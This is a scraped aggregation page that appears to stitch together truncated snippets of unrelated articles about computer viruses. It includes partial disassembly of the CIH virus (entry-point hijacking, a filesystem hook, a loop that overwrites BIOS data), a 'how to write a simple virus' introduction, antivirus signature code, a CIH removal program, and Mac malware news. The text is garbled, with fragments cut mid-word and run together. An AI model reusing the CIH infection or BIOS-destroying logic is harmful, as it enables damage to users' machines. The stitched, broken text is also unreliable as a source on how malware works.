Characteristics of the virus:
The biggest feature of the virus is self-replicating, from the classification of viruses there are many kinds, here we will introduce the most popular add-onVirus, which is adapted to the normal file to achieve its own replication purposes.From a procedural point of view, we have two things to do:
1, so that the program can be copi
Sometimes Win8 's own virus protection program is too sensitive to cause the deletion of things or interception of the program, and sometimes restore the system because in Safe mode can not restore success need to close the virus protection program. In this case, we need to
Virus program source code instance analysis-example code of CIH virus [2] can be referred to push eax; block table size
Push edx; edx is the offset of the virus code block table
Push esi; buffer address
The total size of the merged virus code block and
the size of the first virus code block
Lea EAX, [ebp+edi-04h]
mov [EAX], ebx
; Set the first block of viruses
Push ebx; The size of the first block of the virus code
Add edx, EDI
push edx; file pointer
Lea EDI, (myvirusstart-@9) [esi]
Push EDI; buffer address
Modify the entrance of the addressofentrypoint for the virus entrance
MOV (NEWADDRESSOFEN
file offsets. The structure is as follows:#define Namelen 20#define signlen 32typedef struct sign{ char Szvirusname[namelen]; LONG Lfileoffset; BYTE Bvirussign[signlen + 1];} _sign, *psign;Use this data structure to define a global variable that holds the signatures of the two viruses, defined as follows:Sign Sign[2] = {{ //setup.exe "setup.exe", 0x0c040, "\x2a\x2a\x2a\xce\xe4\x2a\xba\xba\x2a\xc4\xd0 \x2a\xc9\xfa\x2a\xb8 " " \xd0\x2a\xc8\xbe\x2a\xcf\xc2\x2a\xd4\xd8\x2a\
Virus program source code instance analysis-example code of CIH virus [2] can be referred to below
Virus program source code instance analysis-CIH virus [2]
OriginalAppEXE SEGMENT ; PE format executable file headerFileHeader:Db
Exposure of a New Worm Virus Infected with Mac on an invisible Mac Platform
If you think that Apple Mac is safer than Windows, think twice. The researchers have proved that this is not true.
Mac is no longer "virus-free"
The two
virus Program Source code example Anatomy-CIH virus [5]
Push ECXLoop $ ; destroys the ROM data of additional 000e0000-000e007f segments in the BIOS, a total of 80h bytesXOR Ah, ahmov [EAX], AL Xchg ecx, eaxLoop $ ; Displays and activates the BIOS 000E0000-000FFFFF segment data, a total of KB, the segment can be written to information mov eax, 0f5555hPop
Virus program source code instance analysis-CIH virus [3] code, you need to refer to the jmp ExitRing0Init; exit Ring0 level
; Size of the merged code
CodeSizeOfMergeVirusCodeSection = offset $
; New IFSMgr_InstallFileSystemApiHook function call
InstallFileSystemApiHook:
Push ebx
Call @ 4
@ 4:
Pop ebx; get the offset address of the current command
Add
Because the running program is protected by Windows, viruses are often killed and cannot be deleted even if they are found. Antivirus software kills the virus how to do? It used to be recommended to kill in Safe mode or DOS mode. Now there is a new method called "Specify the debugger in the image File Execution option", and it should be possible to disinfect it in this way. The principle is to modify the re
6.2 6.2 Domain Name information query 6.2.1 (1) DNS message format and domain name query function 6.2.2 (2) Download management function Downloadmanager 6.2.3 (3) Domain name query function txtquery 6.3 6.3 HTTP protocol Download Virus library files
1 ClamAV Overview
Computer anti-virus methods generally have comparative method, file checksum method, virus
Continued: Mac
OS X: security warning. The virus is around you.
According to the previous documents, the security company issued a Mac OS X virus warning. Let's take a look at how to determine if your Mac system is infected.
The first step is very simple. Although y
compared to the Windows platform, there seems to be little user security on the Mac platform, so does this mean that Apple is really not going to get the virus?
Apple Mac computer not virus? You think it's naïve (pictures from Yahoo)
A few years ago, flash-back malware found a security vulnerability in the Ja
Recently, a "iworm" of the Mac system virus wantonly spread, the virus can be directly executed on the MAC computer commands, and steal user data. According to statistics, the world has 18,500 Mac computers infected with this malicious software.
To see if you are infected
Document directory
How to Write a simple virus program
How to Write a simple virus program
Author: QQ: 273764089Author's mailbox: [email] 273764089@qq.com [/Email]Author blog: http://hqsoft.blogdriver.comReprinted please indicate the source: http://www.czvc.com
Note: The virus
Ransomware virus in OS X system security risks of operating system X Mac hard disk being encrypted by hackers
In the past, the security of OS X systems often gave users a sense of reliability and stability. However, with the increase in Mac user base and the increase in OS x information value, OS X has gradually become the target of hacker attacks in recent year
Just as we are excited to watch the release of the new Mac OS X, another unfortunate message came from the network security field, and a new Mac virus was detected.
This virus, which was first detected and analyzed and released by intego, is very different from previous ones, for example, the last flashback, the w
of small size can bring a virus program into full play. Generally, only a program written in a few kilobytes contains all the functions. Generally, a virus has the following functions:
ICodeRelocation
2. Find the required API address.
3. Search for files and directories
Four infected files
5. damage the syst
; This program is compiled by TASM
; CIH file-type virus detection and elimination program
Gofirst MACRO
XOR CX,CX
XOR DX,DX
MOV ax,4200h
INT 21H; file pointer to top of file
Endm
Alterline MACRO
MOV DL,0DH
MOV ah,02h
INT 21H; carriage return
MOV dl,0ah
MOV ah,02h
INT 21H; line Wrap
Endm
Copyhandle MACRO
PUSH BX
MOV ah,45h
INT 21H; copy file handle
MOV Bx,ax
MOV
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.